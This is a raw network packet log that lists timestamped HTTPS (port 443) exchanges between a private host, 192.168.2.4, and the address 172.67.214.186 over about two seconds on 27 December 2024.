                                                                                                                                      Dec 27, 2024 10:22:03.881294966 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.881350040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.884166956 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.886795998 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.886812925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.886878014 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.886912107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.886933088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.886954069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.891783953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.891799927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.891865969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.891902924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.892117023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.897372961 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.897396088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.897499084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.897542953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.900135040 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.902870893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.902884960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.902961016 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.902997017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.906131983 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.908482075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.908498049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.908565998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.908593893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.910159111 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.914205074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.914235115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.914279938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.914309025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.914330006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.918159962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.919409037 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.919425011 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.919492960 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:03.919504881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:03.923234940 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.082644939 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.082664013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.082707882 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.082750082 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.082770109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.082809925 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.087692976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.087709904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.087789059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.087798119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.088108063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.093360901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.093377113 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.093439102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.093457937 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.094130993 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.099133015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.099148035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.099225044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.099237919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.100130081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.104377031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.104393959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.104465008 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.104476929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.104543924 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.110474110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.110493898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.110568047 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.110577106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.112135887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.115005016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.115021944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.115057945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.115066051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.115087032 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.115111113 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.120723009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.120738983 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.120796919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.120806932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.120862961 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.284471989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.284490108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.284730911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.284755945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.288136959 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.289273977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.289292097 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.289355993 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.289364100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.292126894 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.295053005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.295068979 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.295140982 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.295150042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.300144911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.300610065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.300627947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.300676107 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.300683975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.300719976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.305947065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.305984974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.306026936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.306039095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.306054115 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.308132887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.311702013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.311719894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.311784029 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.311794043 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.312117100 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.316744089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.316761017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.316814899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.316826105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.320156097 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.322536945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.322554111 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.322617054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.322628021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.324125051 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.485884905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.485912085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.486037016 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.486088991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.488143921 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.490906954 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.490922928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.490987062 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.491010904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.492121935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.496589899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.496608019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.496682882 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.496706009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.498166084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.502331972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.502348900 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.502423048 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.502453089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.504127979 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.507530928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.507548094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.507611036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.507636070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.508116007 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.513231039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.513247967 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.513313055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.513343096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.516135931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.518291950 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.518306971 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.518372059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.518397093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.520131111 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.524068117 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.524084091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.524161100 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.524187088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.528167009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.687444925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.687463999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.687531948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.687577963 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.688528061 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.692500114 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.692512989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.692620993 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.692651987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.692806959 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.698179960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.698194027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.698278904 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.698307991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.698344946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.703975916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.703990936 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.704056978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.704083920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.706171989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.709243059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.709258080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.709311962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.709331989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.709764004 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.714844942 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.714859009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.714920044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.714946032 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.715629101 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.719943047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.719955921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.720014095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.720033884 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.720076084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.725620985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.725636005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.725713015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.725748062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.726265907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.888969898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.888987064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.889030933 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.889072895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.889091969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.889166117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.894042969 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.894058943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.894166946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.894181013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.894221067 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.899719954 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.899734974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.899806976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.899820089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.899889946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.905272007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.905328035 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.905333042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.905344009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.905384064 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.910645008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.910660982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.910738945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.910753965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.913428068 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.916392088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.916408062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.916466951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.916480064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.918499947 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.921349049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.921365976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.921433926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.921447039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.923738003 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.927150965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.927167892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.927238941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:04.927253008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:04.930191994 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.090425014 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.090445042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.090527058 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.090596914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.093864918 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.096141100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.096158028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.096251965 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.096270084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.098159075 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.101099968 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.101114035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.101212025 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.101227999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.102335930 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.106739044 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.106751919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.106815100 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.106831074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.110400915 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.112194061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.112206936 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.112270117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.112284899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.114132881 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.117800951 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.117818117 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.117876053 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.117889881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.118206024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.123513937 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.123532057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.123604059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.123619080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.124552965 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.128490925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.128509045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.128586054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.128599882 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.128741026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.291649103 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.291666031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.291706085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.291749001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.291768074 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.291812897 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.297389984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.297405005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.297487020 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.297509909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.297605038 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.302375078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.302387953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.302428961 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.302452087 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.302470922 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.302875042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.308084011 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.308098078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.308192015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.308224916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.308270931 CET49745443192.168.2.4172.67.214.186
